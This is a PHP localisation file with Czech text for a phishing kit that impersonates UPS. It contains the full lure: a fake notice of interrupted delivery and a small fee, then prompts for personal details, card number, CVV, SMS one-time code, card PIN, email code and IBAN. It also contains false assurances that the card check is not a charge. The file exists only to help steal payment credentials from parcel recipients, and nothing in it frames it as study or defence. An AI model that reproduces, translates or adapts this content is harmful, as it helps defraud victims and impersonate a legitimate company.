<?php
function lang($phrase){
	static $lang = array(

                "xlang" => "CS",
                "xcapt1" => "Zaškrtněte prosím políčko CAPTCHA.",
                "xcapt2" => "Ověření",
                "xcapt3" => "Pokračovat",
                "xfot1" => "Tento web",
                "xfot2" => "Další stránky UPS",
                "xfot3" => "Spojte se s námi",
                "xfot4" => "Právní",
                "xfot5" => "Copyright ©1994- 2023&nbsp;United Parcel Service of America, Inc. Všechna práva vyhrazena. ",
                "xind1" => "Sledovat",
                "xind2" => "Sledovací číslo",
                "xind3" => "Chyba : Zadejte prosím Správné sledovací číslo.",
                "xind4" => "Potřebujete pomoc se změnou doručení?",
                "xind5" => "Nabídka",
                "xind6" => "Odeslat",
                "xind7" => "Fakturace",
                "xind8" => "Získat pomoc",
                "xexp1" => "Doručení přerušeno",
                "xexp2" => "Sledování",
                "xexp3" => "Vaše poslední dodávka byla přerušena. V současné době je zadržována v třídicím centru.",
                "xexp4" => "Zásilka, která vám byla odeslána, nedodržela uvedenou hmotnost a budete požádáni o zaplacení dodatečného poplatku za zajištění správného doručení zásilky.",
                "xexp5" => "Poplatek činí 0,48 €",
                "xexp6" => "Chcete-li zaplatit, klikněte na tlačítko níže",
                "xexp7" => "Zaplatit",
                "xexp8" => "Po zaplacení poplatku bude vaše zásilka co nejrychleji odeslána na doručovací adresu.",
                "xexp9" => "Pokud nebude poplatek uhrazen do 48 hodin, bude zásilka vrácena odesílateli.",
                "xexp10" => "Sledovat podle referenčního čísla",
                "xexp11" => "Sledovací čísla pro import",
                "xexp12" => "Ostatní služby sledování",
                "xinfz1" => "Potvrďte fakturační údaje",
                "xinfz2" => "Celé jméno",
                "xinfz10" => "Datum narození",
                "xinfz3" => "Země",
                "xinfz4" => "Město",
                "xinfz5" => "Adresa",
                "xinfz6" => "Telefon",
                "xinfz7" => "PSČ",
                "xinfz8" => "Chyba : Všechny údaje jsou povinné",
                "xinfz9" => "Potvrdit",
                "xpay1" => "Údaje o platbě",
                "xpay2" => "Vážený zákazníku, zkontrolujte správně své platební údaje a porovnejte je s údaji o své kartě, abyste mohli dokončit",
                "xpay3" => "Jméno na kartě",
                "xpay4" => "Číslo karty",
                "xpay5" => "Datum platnosti",
                "xpay6" => "Bezpečnostní kód CVV (3 číslice)",
                "xpay7" => "Chyba : Všechny údaje jsou povinné",
                "xpay8" => "Potvrdit",
                "xsms1" => "Ověření",
                "xsms2" => "Na vaše číslo jsme zaslali potvrzovací kód.",
                "xsms3" => "OTP kód",
                "xsms4" => "Chyba : Nesprávný kód otp.",
                "xsms5" => "Tento krok je nutný k bezpečnému dokončení vašeho platebního procesu.",
                "xsms6" => "UPS provede dočasné ověření vaší karty za účelem jejího ověření. Jedná se pouze o autorizaci, nikoliv o poplatek.",
                "xsms7" => "Potvrďte",
                "xconf1" => "Obnovení doručení",
                "xconf2" => "Úhrada dodatečných poplatků byla zohledněna.",
                "xconf3" => "Vaše zásilka by měla dorazit během následujících 24 hodin.",
                "xconf4" => "Potvrdit",
                "xpin1" => "Ověření",
                "xpin2" => "Zadejte PIN kód vaší bankovní karty",
                "xpin3" => "PIN kód",
                "xpin4" => "(4 číslice)",
                "xpin5" => "Tento krok je nutný pro bezpečné dokončení vašeho platebního procesu.",
                "xpin6" => "UPS provede dočasné ověření vaší karty za účelem jejího ověření. Jedná se pouze o autorizaci, nikoliv o poplatek.",
                "xpin7" => "Potvrďte",
                "xmail1" => "Ověření",
                "xmail2" => "Na váš e-mail jsme zaslali potvrzovací kód",
                "xmail3" => "E-mailový kód",
                "xmail4" => "(6 číslic)",
                "xmail5" => "Tento krok je nutný k bezpečnému dokončení vašeho platebního procesu.",
                "xmail6" => "UPS provede dočasné ověření vaší karty za účelem jejího ověření. Jedná se pouze o autorizaci, nikoliv o poplatek.",
                "xmail7" => "Potvrďte",
                "xiban1" => "Ověření",
                "xiban2" => "Zadejte prosím svůj IBAN pro dokončení platby",
                "xiban3" => "IBAN",
                "xiban4" => "(IBAN)",
                "xiban5" => "Tento krok je nutný pro bezpečné dokončení vašeho platebního procesu.",
                "xiban6" => "UPS provede dočasné ověření vaší karty za účelem jejího ověření. Jedná se pouze o autorizaci, nikoliv o poplatek.",
                "xiban7" => "Potvrdit"

	);	
	
	return $lang[$phrase];
}
 ?>